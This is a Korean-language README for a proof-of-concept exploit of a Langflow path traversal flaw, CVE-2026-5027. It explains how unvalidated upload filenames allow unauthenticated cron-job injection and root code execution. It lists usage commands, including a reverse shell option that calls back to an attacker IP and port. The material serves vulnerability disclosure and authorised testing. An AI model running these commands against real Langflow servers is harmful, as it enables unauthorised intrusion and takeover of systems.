
# CVE-2026-5027 개념 증명 익스플로잇 Langflow의 경로 탐색(path traversal) 취약점으로, cron 작업 주입을 통해 인증 없이 원격 코드 실행으로 이어지는 취약점입니다.
Langflow 1.8.4 이하 버전은 POST /api/v2/files 엔드포인트의 filename 매개변수를 검증하지 않습니다. 공격자는 경로 탐색 시퀀스(../)를 사용하여 파일 시스템의 임의 위치에 파일을 쓸 수 있습니다. Langflow의 기본 자동 로그인 구성과 결합하면 인증 없이도 악용이 가능하며, cron 작업 주입을 통해 root 권한으로 원격 코드 실행으로 이어질 수 있습니다.
# 개념 증명 (/tmp/에 테스트 파일 작성)
python3 exploit.py -t http://target:7860
# 자격 증명 사용 (자동 로그인이 비활성화된 경우)
python3 exploit.py -t http://target:7860 -u admin -p password
# cron 작업을 통한 리버스 셸
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444


src/backend/base/langflow/api/v2/files.py의 upload_user_file() 함수는 검증 없이 file.filename을 스토리지 서비스에 직접 전달합니다. LocalStorageService.save_file()는 folder_path / file_name을 사용하여 경로를 구성하므로 디렉터리 탐색을 방지하지 못합니다.
이 도구는 공인된 보안 테스트 및 교육 목적으로만 제공됩니다. 소유한 시스템 또는 명시적 테스트 권한이 있는 시스템에서만 사용하십시오.
Yahia Hamza - https://yh.do